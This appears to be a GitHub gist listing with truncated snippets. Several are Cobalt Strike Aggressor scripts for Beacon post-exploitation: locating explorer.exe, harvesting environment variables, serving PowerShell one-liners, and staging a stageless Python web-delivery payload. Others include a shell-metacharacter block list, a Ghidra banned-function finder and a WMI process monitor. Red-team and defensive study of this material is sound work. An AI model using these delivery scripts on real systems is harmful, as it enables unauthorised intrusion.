This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-RickAstley(){ | |
[console]::beep(440,150)#A | |
[console]::beep(493,150)#B | |
[console]::beep(587,150)#D | |
[console]::beep(493,150)#B | |
Start-Sleep -m 20 | |
[console]::beep(698,400)#F | |
[console]::beep(698,400)#F | |
[console]::beep(659,500)#E | |
Start-Sleep -m 50 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# getexplorerpid($bid, &callback); | |
sub getexplorerpid { | |
bps($1, lambda({ | |
local('$pid $name $entry'); | |
foreach $entry (split("\n", $2)) { | |
($name, $pid) = split("\\s+", $entry); | |
if ($name eq "explorer.exe") { | |
# $1 is our Beacon ID, $pid is the PID of explorer.exe | |
[$callback: $1, $pid]; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Aggressor Script means to parse/use environment vars in a Beacon session. | |
# | |
global('%bvars'); | |
# request environment variables for every new Beacon that comes in. | |
on beacon_initial { | |
# ideally, we'd have a bshell that could take callbacks. We don't have | |
# this yet. Eventually though, we will. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sub IsSafe { | |
#http://sleep.dashnine.org/manual/index.html | |
local('$pos'); | |
@badchars = @(";", "&", '$', "'"); | |
foreach $index => $value (@badchars) | |
{ | |
$pos = indexOf($1, $value); | |
if (-isnumber $pos) | |
{ | |
println("Invalid char detected"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This script locates potentially dangerous functions that could introduce a vulnerability if they are used incorrectly. | |
#@author: VDA Labs (Michael Fowl) | |
#@category Functions | |
print "Searching for banned functions..." | |
# Microsoft SDL banned.h list. | |
blist = (["strcpy", "strcpyA", "strcpyW", "wcscpy", "_tcscpy", "_mbscpy", "StrCpy", | |
"StrCpyA", "StrCpyW", "lstrcpy", "lstrcpyA", "lstrcpyW", "_tccpy", "_mbccpy", | |
"_ftcscpy", "strcat", "strcatA", "strcatW", "wcscat", "_tcscat", "_mbscat", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# host a PowerShell script on a one-off web server via Beacon. | |
# | |
# Why? Generate one-liners for length constrained command execution opportunities | |
# | |
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate! | |
# if there's interest in this capability, I can build an official API for it. | |
import common.*; | |
import beacon.*; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_qvm-run() { | |
local app_vms | |
app_vms=( $(qvm-ls --raw-list|grep -v "^dom0$") ) | |
local exc= | |
if (( words[(I)--all] )); then | |
exc="*--exclude=[When --all is used: exclude this VM name (may be repeated)]:QubesVMs:($app_vms)" | |
fi | |
_arguments -S '(-a --auto)'{-a,--auto}'[Auto start the VM if not running]'\ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### ref: https://twitter.com/dez_/status/986614411711442944 | |
Write-Host "Current Pid: " $Pid | |
(Get-Process -Id $pid).priorityclass = "RealTime" | |
$Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 0.0001 WHERE TargetInstance ISA "Win32_Process"' | |
$action = { | |
$e = $Event.SourceEventArgs.NewEvent.TargetInstance | |
$fmt = 'ProcessStarted: (ID={0,5}, Parent={1,5}, cmdline={2}, ExecutablePath="{3}, Name={4}")' | |
$msg = $fmt -f $e.ProcessId, $e.ParentProcessId, $e.CommandLine, $e.ExecutablePath, $e.Name |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
# | |
# Copyright 2017, Francesco "dfirfpi" Picasso <francesco.picasso@gmail.com> | |
# | |
# Licensed under the Apache License, Version 2.0 (the "License"); | |
# you may not use this file except in compliance with the License. | |
# You may obtain a copy of the License at | |
# | |
# http://www.apache.org/licenses/LICENSE-2.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Python Stageless Scripted Web Delivery | |
# setup our stageless Python Web Delivery attack | |
sub setup_attack { | |
local('%options $x86payload $x64payload $url $script'); | |
%options = $3; | |
# generate our stageless x86 payload | |
artifact_stageless(%options["listener"], "raw", "x86", $null, $this); | |
yield; |
OlderNewer